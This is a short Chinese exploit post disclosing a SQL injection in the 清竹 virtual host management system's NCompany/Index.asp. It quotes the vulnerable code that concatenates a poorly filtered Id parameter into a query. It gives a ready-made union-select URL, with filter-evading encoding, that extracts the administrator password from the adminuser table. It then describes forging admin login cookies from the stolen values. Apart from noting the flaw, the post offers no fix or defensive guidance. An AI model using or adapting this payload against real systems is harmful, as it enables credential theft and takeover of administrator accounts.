清竹虚拟主机管理系统sql注入漏洞
NCompany/Index.asp
[php]
loadfile_fromcache templatePath&"NCompany-Index.html" '加载index.html模板
TempCon=TempCon&Application("Qz_TP_"&templatePath&"NCompany-Index.html")
Id=ReStrs(Request.QueryString("Id"))//过滤不严格
Set rs=Conn.Execute("Select * From [Qz_NComPany] Where [Id]="&Id)//直接带入sql语句
Address=rs("Address")
TelInfo=rs("TelInfo")
[/php]
exp:
[php]ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1[/php]
构造cookie:
[php]
AdminUser = 注入得来的adminuser
PassWord = 注入得来的adminpass[/php]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论